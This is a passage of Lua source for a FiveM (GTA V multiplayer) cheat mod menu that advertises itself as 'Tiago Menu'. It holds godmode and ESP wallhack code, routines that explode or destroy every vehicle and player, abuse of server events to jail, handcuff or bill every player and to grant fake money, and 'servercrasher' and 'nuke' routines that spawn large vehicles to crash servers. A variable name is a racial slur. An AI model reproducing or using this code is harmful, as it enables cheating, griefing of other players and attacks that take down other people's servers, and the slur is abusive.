- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38) - 1, true)
- SetVehicleWindowTint(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1)
- SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
- SetVehicleNumberPlateTextIndex(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5)
- end
- function DelVeh(veh)
- SetEntityAsMissionEntity(Object, 1, 1)
- DeleteEntity(Object)
- SetEntityAsMissionEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, 1)
- DeleteEntity(GetVehiclePedIsIn(GetPlayerPed(-1), false))
- end
- function Clean(veh)
- SetVehicleDirtLevel(veh, 15.0)
- end
- function Clean2(veh)
- SetVehicleDirtLevel(veh, 1.0)
- end
- entityEnumerator = {
- __gc = function(enum)
- if enum.destructor and enum.handle then
- enum.destructor(enum.handle)
- end
- enum.destructor = nil
- enum.handle = nil
- end
- }
- function EnumerateEntities(initFunc, moveFunc, disposeFunc)
- return coroutine.wrap(function()
- local iter, id = initFunc()
- if not id or id == 0 then
- disposeFunc(iter)
- return
- end
- local enum = {handle = iter, destructor = disposeFunc}
- setmetatable(enum, entityEnumerator)
- local next = true
- repeat
- coroutine.yield(id)
- next, id = moveFunc(iter)
- until not next
- enum.destructor, enum.handle = nil, nil
- disposeFunc(iter)
- end)
- end
- function EnumerateObjects()
- return EnumerateEntities(FindFirstObject, FindNextObject, EndFindObject)
- end
- function EnumeratePeds()
- return EnumerateEntities(FindFirstPed, FindNextPed, EndFindPed)
- end
- function EnumerateVehicles()
- return EnumerateEntities(FindFirstVehicle, FindNextVehicle, EndFindVehicle)
- end
- function EnumeratePickups()
- return EnumerateEntities(FindFirstPickup, FindNextPickup, EndFindPickup)
- end
- function RequestControl(entity)
- local Waiting = 0
- NetworkRequestControlOfEntity(entity)
- while not NetworkHasControlOfEntity(entity) do
- Waiting = Waiting + 100
- Citizen.Wait(100)
- if Waiting > 5000 then
- drawNotification("Hung for 5 seconds, killing to prevent issues...")
- end
- end
- end
- function getEntity(player)
- local result, entity = GetEntityPlayerIsFreeAimingAt(player, Citizen.ReturnResultAnyway())
- return entity
- end
- function GetInputMode()
- return Citizen.InvokeNative(0xA571D46727E2B718, 2) and "MouseAndKeyboard" or "GamePad"
- end
- function DrawSpecialText(m_text, showtime)
- SetTextEntry_2("STRING")
- AddTextComponentString(m_text)
- DrawSubtitleTimed(showtime, 1)
- end
- local playerBlips = true
- ShowHudComponentThisFrame(14)
- Citizen.CreateThread(function()
- local headId = {}
- while true do
- Citizen.Wait(1)
- if playerBlips then
- for id = 0, 128 do
- if NetworkIsPlayerActive(id) and GetPlayerPed(id) ~= GetPlayerPed(-1) then
- ped = GetPlayerPed(id)
- blip = GetBlipFromEntity(ped)
- headId[id] = CreateMpGamerTag(ped, GetPlayerName( id ), false, false, "", false)
- wantedLvl = GetPlayerWantedLevel(id)
- if wantedLvl then
- SetMpGamerTagVisibility(headId[id], 7, true)
- SetMpGamerTagWantedLevel(headId[id], wantedLvl)
- else
- SetMpGamerTagVisibility(headId[id], 7, false)
- end
- if NetworkIsPlayerTalking(id) then
- SetMpGamerTagVisibility(headId[id], 9, true)
- else
- SetMpGamerTagVisibility(headId[id], 9, false)
- end
- if not DoesBlipExist(blip) then
- blip = AddBlipForEntity(ped)
- SetBlipSprite(blip, 1)
- ShowHeadingIndicatorOnBlip(blip, true)
- else
- veh = GetVehiclePedIsIn(ped, false)
- blipSprite = GetBlipSprite(blip)
- if not GetEntityHealth(ped) then
- if blipSprite ~= 274 then
- SetBlipSprite(blip, 274)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif veh then
- vehClass = GetVehicleClass(veh)
- vehModel = GetEntityModel(veh)
- if vehClass == 15 then
- if blipSprite ~= 422 then
- SetBlipSprite(blip, 422)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehClass == 8 then
- if blipSprite ~= 226 then
- SetBlipSprite(blip, 226)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehClass == 16 then
- if vehModel == GetHashKey("besra") or vehModel == GetHashKey("hydra") or vehModel == GetHashKey("lazer") then
- if blipSprite ~= 424 then
- SetBlipSprite(blip, 424)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif blipSprite ~= 423 then
- SetBlipSprite(blip, 423)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehClass == 14 then
- if blipSprite ~= 427 then
- SetBlipSprite(blip, 427)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("insurgent") or vehModel == GetHashKey("insurgent2") or vehModel == GetHashKey("insurgent3") then
- if blipSprite ~= 426 then
- SetBlipSprite(blip, 426)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("limo2") then
- if blipSprite ~= 460 then
- SetBlipSprite(blip, 460)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("rhino") then
- if blipSprite ~= 421 then
- SetBlipSprite(blip, 421)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("trash") or vehModel == GetHashKey("trash2") then
- if blipSprite ~= 318 then
- SetBlipSprite(blip, 318)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("pbus") then
- if blipSprite ~= 513 then
- SetBlipSprite(blip, 513)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("seashark") or vehModel == GetHashKey("seashark2") or vehModel == GetHashKey("seashark3") then
- if blipSprite ~= 471 then
- SetBlipSprite(blip, 471)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("cargobob") or vehModel == GetHashKey("cargobob2") or vehModel == GetHashKey("cargobob3") or vehModel == GetHashKey("cargobob4") then -- Cargobobs
- if blipSprite ~= 481 then
- SetBlipSprite(blip, 481)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("technical") or vehModel == GetHashKey("technical2") or vehModel == GetHashKey("technical3") then -- Technical
- if blipSprite ~= 426 then
- SetBlipSprite(blip, 426)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("taxi") then
- if blipSprite ~= 198 then
- SetBlipSprite(blip, 198)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif vehModel == GetHashKey("fbi") or vehModel == GetHashKey("fbi2") or vehModel == GetHashKey("police2") or vehModel == GetHashKey("police3") -- Police Vehicles
- or vehModel == GetHashKey("police") or vehModel == GetHashKey("sheriff2") or vehModel == GetHashKey("sheriff")
- or vehModel == GetHashKey("policeold2") or vehModel == GetHashKey("policeold1") then
- if blipSprite ~= 56 then
- SetBlipSprite(blip, 56)
- ShowHeadingIndicatorOnBlip(blip, false)
- end
- elseif blipSprite ~= 1 then
- SetBlipSprite(blip, 1)
- ShowHeadingIndicatorOnBlip(blip, true)
- end
- passengers = GetVehicleNumberOfPassengers(veh)
- if passengers then
- if not IsVehicleSeatFree(veh, -1) then
- passengers = passengers + 1
- end
- ShowNumberOnBlip(blip, passengers)
- else
- HideNumberOnBlip(blip)
- end
- else
- HideNumberOnBlip(blip)
- if blipSprite ~= 1 then
- SetBlipSprite(blip, 1)
- ShowHeadingIndicatorOnBlip(blip, true)
- end
- end
- SetBlipRotation(blip, math.ceil(GetEntityHeading(veh)))
- SetBlipNameToPlayerName(blip, id)
- SetBlipScale(blip, 0.85)
- if IsPauseMenuActive() then
- SetBlipAlpha( blip, 255 )
- else
- x1, y1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
- x2, y2 = table.unpack(GetEntityCoords(GetPlayerPed(id), true))
- distance = (math.floor(math.abs(math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))) / -1)) + 900
- if distance < 0 then
- distance = 0
- elseif distance > 255 then
- distance = 255
- end
- SetBlipAlpha(blip, distance)
- end
- end
- end
- end
- else
- for id = 0, 128 do
- ped = GetPlayerPed(id)
- blip = GetBlipFromEntity(ped)
- if DoesBlipExist(blip) then
- RemoveBlip(blip)
- end
- if IsMpGamerTagActive(headId[id]) then
- RemoveMpGamerTag(headId[id])
- end
- end
- end
- end
- end)
- Citizen.CreateThread(
- function()
- while Enabled do
- Citizen.Wait(0)
- SetPlayerInvincible(PlayerId(), Godmode)
- SetEntityInvincible(PlayerPedId(), Godmode)
- if SuperJump then
- SetSuperJumpThisFrame(PlayerId())
- end
- if ePunch then
- SetExplosiveMeleeThisFrame(PlayerId())
- end
- if InfStamina then
- RestorePlayerStamina(PlayerId(), 1.0)
- end
- if Invisible then
- SetEntityVisible(GetPlayerPed(-1), false, 0)
- else
- SetEntityVisible(GetPlayerPed(-1), true, 0)
- if fastrun then
- SetRunSprintMultiplierForPlayer(PlayerId(), 2.49)
- SetPedMoveRateOverride(GetPlayerPed(-1), 2.15)
- else
- SetRunSprintMultiplierForPlayer(PlayerId(), 1.0)
- SetPedMoveRateOverride(GetPlayerPed(-1), 1.0)
- end
- end
- local function ToggleGodmode(tog)
- local ped = PlayerPedId()
- SetEntityProofs(ped, tog, tog, tog, tog, tog)
- SetPedCanRagdoll(PlayerPedId(), not tog)
- end
- if Demigod then
- if GetEntityHealth(PlayerPedId()) < 200 then
- SetEntityHealth(PlayerPedId(), 200)
- end
- end
- if Forcefield then
- ForcefieldPlayer(PlayerId(), ForcefieldRadius)
- end
- if VehicleGun then
- local VehicleGunVehicle = "Freight"
- local playerPedPos = GetEntityCoords(GetPlayerPed(-1), true)
- if (IsPedInAnyVehicle(GetPlayerPed(-1), true) == false) then
- drawNotification("~g~Vehicle Gun Enabled!~n~~w~Use The ~b~AP Pistol~n~~b~Aim ~w~and ~b~Shoot!")
- GiveWeaponToPed(GetPlayerPed(-1), GetHashKey("WEAPON_APPISTOL"), 999999, false, true)
- SetPedAmmo(GetPlayerPed(-1), GetHashKey("WEAPON_APPISTOL"), 999999)
- if (GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey("WEAPON_APPISTOL")) then
- if IsPedShooting(GetPlayerPed(-1)) then
- while not HasModelLoaded(GetHashKey(VehicleGunVehicle)) do
- Citizen.Wait(0)
- RequestModel(GetHashKey(VehicleGunVehicle))
- end
- local veh = CreateVehicle(GetHashKey(VehicleGunVehicle), playerPedPos.x + (5 * GetEntityForwardX(GetPlayerPed(-1))), playerPedPos.y + (5 * GetEntityForwardY(GetPlayerPed(-1))), playerPedPos.z + 2.0, GetEntityHeading(GetPlayerPed(-1)), true, true)
- SetEntityAsNoLongerNeeded(veh)
- SetVehicleForwardSpeed(veh, 150.0)
- end
- end
- end
- end
- if DeleteGun then
- local gotEntity = getEntity(PlayerId())
- if (IsPedInAnyVehicle(GetPlayerPed(-1), true) == false) then
- drawNotification("~g~Delete Gun Enabled!~n~~w~Use The ~b~Pistol~n~~b~Aim ~w~and ~b~Shoot ~w~To Delete!")
- GiveWeaponToPed(GetPlayerPed(-1), GetHashKey("WEAPON_PISTOL"), 999999, false, true)
- SetPedAmmo(GetPlayerPed(-1), GetHashKey("WEAPON_PISTOL"), 999999)
- if (GetSelectedPedWeapon(GetPlayerPed(-1)) == GetHashKey("WEAPON_PISTOL")) then
- if IsPlayerFreeAiming(PlayerId()) then
- if IsEntityAPed(gotEntity) then
- if IsPedInAnyVehicle(gotEntity, true) then
- if IsControlJustReleased(1, 142) then
- SetEntityAsMissionEntity(GetVehiclePedIsIn(gotEntity, true), 1, 1)
- DeleteEntity(GetVehiclePedIsIn(gotEntity, true))
- SetEntityAsMissionEntity(gotEntity, 1, 1)
- DeleteEntity(gotEntity)
- drawNotification("~g~Deleted!")
- end
- else
- if IsControlJustReleased(1, 142) then
- SetEntityAsMissionEntity(gotEntity, 1, 1)
- DeleteEntity(gotEntity)
- drawNotification("~g~Deleted!")
- end
- end
- else
- if IsControlJustReleased(1, 142) then
- SetEntityAsMissionEntity(gotEntity, 1, 1)
- DeleteEntity(gotEntity)
- drawNotification("~g~Deleted!")
- end
- end
- end
- end
- end
- end
- if fuckallcars then
- for aP in EnumerateVehicles() do
- if not
- IsPedAPlayer(GetPedInVehicleSeat(aP, -1)) then SetVehicleHasBeenOwnedByPlayer(aP, false) SetEntityAsMissionEntity(aP, false, false) StartVehicleAlarm(aP) DetachVehicleWindscreen(aP) SmashVehicleWindow(aP, 0) SmashVehicleWindow(aP, 1) SmashVehicleWindow(aP, 2) SmashVehicleWindow(aP, 3) SetVehicleTyreBurst(aP, 0, true, 1000.0) SetVehicleTyreBurst(aP, 1, true, 1000.0) SetVehicleTyreBurst(aP, 2, true, 1000.0) SetVehicleTyreBurst(aP, 3, true, 1000.0) SetVehicleTyreBurst(aP, 4, true, 1000.0) SetVehicleTyreBurst(aP, 5, true, 1000.0) SetVehicleTyreBurst(aP, 4, true, 1000.0) SetVehicleTyreBurst(aP, 7, true, 1000.0) SetVehicleDoorBroken(aP, 0, true) SetVehicleDoorBroken(aP, 1, true) SetVehicleDoorBroken(aP, 2, true) SetVehicleDoorBroken(aP, 3, true) SetVehicleDoorBroken(aP, 4, true) SetVehicleDoorBroken(aP, 5, true) SetVehicleDoorBroken(aP, 6, true) SetVehicleDoorBroken(aP, 7, true) SetVehicleLights(aP, 1) Citizen.InvokeNative(0x1FD09E7390A74D54, aP, 1) SetVehicleNumberPlateTextIndex(aP, 5) SetVehicleNumberPlateText(aP, "TiagoMenu") SetVehicleDirtLevel(aP, 10.0) SetVehicleModColor_1(aP, 1) SetVehicleModColor_2(aP, 1) SetVehicleCustomPrimaryColour(aP, 255, 51, 255) SetVehicleCustomSecondaryColour(aP, 255, 51, 255) SetVehicleBurnout(aP, true) end end end
- if destroyvehicles then
- for vehicle in EnumerateVehicles() do
- if vehicle ~=
- GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) SetVehicleUndriveable(vehicle, true) SetVehicleEngineHealth(vehicle, 0) end end end
- if alarmvehicles then
- for vehicle in EnumerateVehicles() do
- if vehicle ~=
- GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) SetVehicleAlarm(vehicle, true) StartVehicleAlarm(vehicle) end end end
- if explodevehicles then
- for vehicle in EnumerateVehicles() do
- if vehicle ~=
- GetVehiclePedIsIn(GetPlayerPed(-1), false) then NetworkRequestControlOfEntity(vehicle) NetworkExplodeVehicle(vehicle, true, true, false) end end end
- if huntspam then Citizen.Wait(1) TriggerServerEvent('esx-qalle-hunting:reward', 20000) TriggerServerEvent('esx-qalle-hunting:sell') end
- if deletenearestvehicle then
- for vehicle in EnumerateVehicles() do
- if vehicle ~=
- GetVehiclePedIsIn(GetPlayerPed(-1), false) then SetEntityAsMissionEntity(GetVehiclePedIsIn(vehicle, true), 1, 1) DeleteEntity(GetVehiclePedIsIn(vehicle, true)) SetEntityAsMissionEntity(vehicle, 1, 1) DeleteEntity(vehicle) end end end
- if freezeall then
- for i = 0, 128 do
- TriggerServerEvent("OG_cuffs:cuffCheckNearest", GetPlayerServerId(i))
- TriggerServerEvent("CheckHandcuff", GetPlayerServerId(i))
- TriggerServerEvent('cuffServer', GetPlayerServerId(i))
- TriggerServerEvent("cuffGranted", GetPlayerServerId(i))
- TriggerServerEvent("police:cuffGranted", GetPlayerServerId(i))
- TriggerServerEvent('esx_handcuffs:cuffing', GetPlayerServerId(i))
- TriggerServerEvent('esx_policejob:handcuff', GetPlayerServerId(i))
- end
- end
- if explodevehicles then
- for vehicle in EnumerateVehicles() do
- if (vehicle ~= GetVehiclePedIsIn(GetPlayerPed(-1), false)) and (not GotTrailer or (GotTrailer and vehicle ~= TrailerHandle)) then
- NetworkRequestControlOfEntity(vehicle)
- NetworkExplodeVehicle(vehicle, true, true, false)
- end
- end
- end
- if crosshair then
- ShowHudComponentThisFrame(14)
- end
- if crosshair2 then
- ch("~r~+",0.495,0.484)
- end
- if crosshair3 then
- ch("~r~.",0.4968,0.478)
- end
- if CLEAR then
- SetWeatherTypePersist("CLEAR")
- SetWeatherTypeNowPersist("CLEAR")
- SetWeatherTypeNow("CLEAR")
- SetOverrideWeather("CLEAR")
- end
- if BLIZZARD then
- SetWeatherTypePersist("BLIZZARD")
- SetWeatherTypeNowPersist("BLIZZARD")
- SetWeatherTypeNow("BLIZZARD")
- SetOverrideWeather("BLIZZARD")
- end
- if FOGGY then
- SetWeatherTypePersist("FOGGY")
- SetWeatherTypeNowPersist("FOGGY")
- SetWeatherTypeNow("FOGGY")
- SetOverrideWeather("FOGGY")
- end
- if EXTRASUNNY then
- SetWeatherTypePersist("EXTRASUNNY")
- SetWeatherTypeNowPersist("EXTRASUNNY")
- SetWeatherTypeNow("EXTRASUNNY")
- SetOverrideWeather("EXTRASUNNY")
- end
- if XMAS then
- SetForceVehicleTrails(true)
- SetForcePedFootstepsTracks(true)
- SetWeatherTypePersist("XMAS")
- SetWeatherTypeNowPersist("XMAS")
- SetWeatherTypeNow("XMAS")
- SetOverrideWeather("XMAS")
- end
- if esp then
- for i = 0, 128 do
- if i ~= PlayerId() and GetPlayerServerId(i) ~= 0 then
- local ra = RGBRainbow(1.0)
- local pPed = GetPlayerPed(i)
- local cx, cy, cz = table.unpack(GetEntityCoords(PlayerPedId()))
- local x, y, z = table.unpack(GetEntityCoords(pPed))
- local message =
- "~h~ID: " ..GetPlayerServerId(i) .." ~r~~h~ "..GetPlayerName(i) .."\n~h~~b~ Dist: " .. math.round(GetDistanceBetweenCoords(cx, cy, cz, x, y, z, false), 1)
- DrawText3D(x, y, z + 1.0, message, 255, 255, 255)
- LineOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
- LineOneEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
- LineTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
- LineTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
- LineThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
- LineThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, -0.9)
- LineFourBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
- TLineOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
- TLineOneEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
- TLineTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
- TLineTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
- TLineThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
- TLineThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, 0.8)
- TLineFourBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
- ConnectorOneBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, 0.8)
- ConnectorOneEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, 0.3, -0.9)
- ConnectorTwoBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, 0.8)
- ConnectorTwoEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, 0.3, -0.9)
- ConnectorThreeBegin = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, 0.8)
- ConnectorThreeEnd = GetOffsetFromEntityInWorldCoords(pPed, -0.3, -0.3, -0.9)
- ConnectorFourBegin = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, 0.8)
- ConnectorFourEnd = GetOffsetFromEntityInWorldCoords(pPed, 0.3, -0.3, -0.9)
- end
- end
- end
- local niggerVehicle = GetVehiclePedIsIn(PlayerPedId(), false)
- if IsPedInAnyVehicle(PlayerPedId()) then
- if driftMode then
- SetVehicleGravityAmount(niggerVehicle, 5.0)
- elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
- SetVehicleGravityAmount(niggerVehicle, 10.0)
- end
- if superGrip then
- SetVehicleGravityAmount(niggerVehicle, 20.0)
- elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
- SetVehicleGravityAmount(niggerVehicle, 10.0)
- end
- if enchancedGrip then
- SetVehicleGravityAmount(niggerVehicle, 12.0)
- elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
- SetVehicleGravityAmount(niggerVehicle, 10.0)
- end
- if fdMode then
- SetVehicleGravityAmount(niggerVehicle, 5.5)
- SetVehicleEngineTorqueMultiplier(niggerVehicle, 4.0)
- elseif not superGrip and not enchancedGrip and not fdMode and not driftMode then
- SetVehicleGravityAmount(niggerVehicle, 10.0)
- SetVehicleEngineTorqueMultiplier(niggerVehicle, 1.0)
- end
- if t2x then
- SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),2.0)
- end
- if t4x then
- SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),4.0)
- end
- if t8x then
- SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),8.0)
- end
- if t16x then
- SetVehicleEngineTorqueMultiplier(GetVehiclePedIsIn(GetPlayerPed(-1),false),16.0)
- end
- end
- if supergrip then
- SetHandlingInt(GetVehiclePedIsUsing(PlayerPedId()), CHandlingData, fTractionCurveMin, 1000000)
- end
- if VehGod and IsPedInAnyVehicle(PlayerPedId(), true) then
- SetEntityInvincible(GetVehiclePedIsUsing(PlayerPedId()), true)
- end
- if blowall then
- for i = 0, 128 do
- AddExplosion(GetEntityCoords(GetPlayerPed(i)), 2, 100000.0, true, false, 100000.0)
- end
- end
- if freezePlayer then
- ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
- end
- if banallusers then
- for i = 0, 128 do
- TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(i), 45 * 60)
- TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(i), 45 * 60)
- TriggerServerEvent("js:jailuser", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.2* buy Mod Menu in")
- TriggerServerEvent("esx-qalle-jail:jailPlayer", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.1* buy Mod Menu in")
- TriggerServerEvent("esx-qalle-jail:updateJailTime_n96nDDU@X?@zpf8", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.2* buy Mod Menu in")
- end
- end
- if esxdestroy then
- for i = 0, 128 do
- TriggerServerEvent('esx_truckerjob:pay', 9999999999)
- TriggerServerEvent('AdminMenu:giveCash', 9999999999)
- TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
- TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
- TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
- TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
- TriggerServerEvent('esx_billing:sendBill', GetPlayerServerId(i), "Purposeless", "Best Tiago Menu 3.2", 10000000)
- end
- end
- if servercrasher then
- local camion = "phantom"
- local avion = "CARGOPLANE"
- local avion2 = "luxor"
- local heli = "maverick"
- local random = "bus"
- CreateVehicle(GetHashKey(avion), 0, 0, -10, true, true)
- CreateVehicle(GetHashKey(avion), 0, 0, -50, true, true)
- CreateVehicle(GetHashKey(avion), 0, 0, -100, true, true)
- CreateVehicle(GetHashKey(avion2), 0, 3, -1000, true, true)
- CreateVehicle(GetHashKey(avion2), 1621, 0, -50, true, true)
- CreateVehicle(GetHashKey(avion2), 1242, 1, -100, true, true)
- CreateVehicle(GetHashKey(camion), 612, 4, -10, true, true)
- CreateVehicle(GetHashKey(camion), 1234, 0, -50, true, true)
- CreateVehicle(GetHashKey(camion), 0, 0, -100, true, true)
- CreateVehicle(GetHashKey(random), 512, 1233, -10, true, true)
- CreateVehicle(GetHashKey(random), 155, 2, -50, true, true)
- CreateVehicle(GetHashKey(random), 333, 0, -100, true, true)
- CreateVehicle(GetHashKey(heli), -121, 100, -10, true, true)
- CreateVehicle(GetHashKey(heli), -121, 2555, -50, true, true)
- CreateVehicle(GetHashKey(heli), -121, 123, -100, true, true)
- end
- if not Collision then
- playerveh = GetVehiclePedIsIn(PlayerPedId(), false)
- for k in EnumerateVehicles() do
- SetEntityNoCollisionEntity(k, playerveh, true)
- end
- for k in EnumerateObjects() do
- SetEntityNoCollisionEntity(k, playerveh, true)
- end
- for k in EnumeratePeds() do
- SetEntityNoCollisionEntity(k, playerveh, true)
- end
- for k in EnumeratePickups() do
- SetEntityNoCollisionEntity(k, playerveh, true)
- end
- end
- local ci = true
- if ci then
- local cK = false
- local cL = 130
- local cM = 0
- for i = 0, 128 do
- if NetworkIsPlayerActive(i) and GetPlayerPed(i) ~= GetPlayerPed(-1) then
- ped = GetPlayerPed(i)
- blip = GetBlipFromEntity(ped)
- x1, y1, z1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
- x2, y2, z2 = table.unpack(GetEntityCoords(GetPlayerPed(i), true))
- distance = math.floor(GetDistanceBetweenCoords(x1, y1, z1, x2, y2, z2, true))
- if cK then
- if NetworkIsPlayerTalking(i) then
- local cN = d(1.0)
- DrawText3D(
- x2,
- y2,
- z2 + 1.2,
- GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
- cN.r,
- cN.g,
- cN.b
- )
- else
- DrawText3D(
- x2,
- y2,
- z2 + 1.2,
- GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
- 255,
- 255,
- 255
- )
- end
- end
- if distance < cL then
- if not cK then
- if NetworkIsPlayerTalking(i) then
- local cN = d(1.0)
- DrawText3D(
- x2,
- y2,
- z2 + 1.2,
- GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
- cN.r,
- cN.g,
- cN.b
- )
- else
- DrawText3D(
- x2,
- y2,
- z2 + 1.2,
- GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
- 255,
- 255,
- 255
- )
- end
- end
- end
- end
- end
- end
- if nuke then
- local camion = "phantom"
- local avion = "CARGOPLANE"
- local avion2 = "luxor"
- local heli = "maverick"
- local random = "bus"
- for i = 0, 128 do
- while not HasModelLoaded(GetHashKey(avion)) do
- Citizen.Wait(0)
- RequestModel(GetHashKey(avion))
- end
- Citizen.Wait(200)
- local avion2 = CreateVehicle(GetHashKey(camion), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
- CreateVehicle(GetHashKey(camion), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
- CreateVehicle(GetHashKey(camion), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
- CreateVehicle(GetHashKey(avion), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
- CreateVehicle(GetHashKey(avion), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
- CreateVehicle(GetHashKey(avion), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
- CreateVehicle(GetHashKey(avion2), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
- CreateVehicle(GetHashKey(avion2), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
- CreateVehicle(GetHashKey(avion2), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
- CreateVehicle(GetHashKey(heli), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
- CreateVehicle(GetHashKey(heli), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
- CreateVehicle(GetHashKey(heli), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
- CreateVehicle(GetHashKey(random), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
- CreateVehicle(GetHashKey(random), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
- CreateVehicle(GetHashKey(random), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true)
- end
- end
- if VehSpeed and IsPedInAnyVehicle(PlayerPedId(), true) then
- if IsControlPressed(0, 118) then
- SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId()), 70.0)
- elseif IsControlPressed(0, 109) then
- SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId()), 0.0)
- end
- end
- if bifegfubffff then
- local impact, coords = GetPedLastWeaponImpactCoord(PlayerPedId())
- if impact then
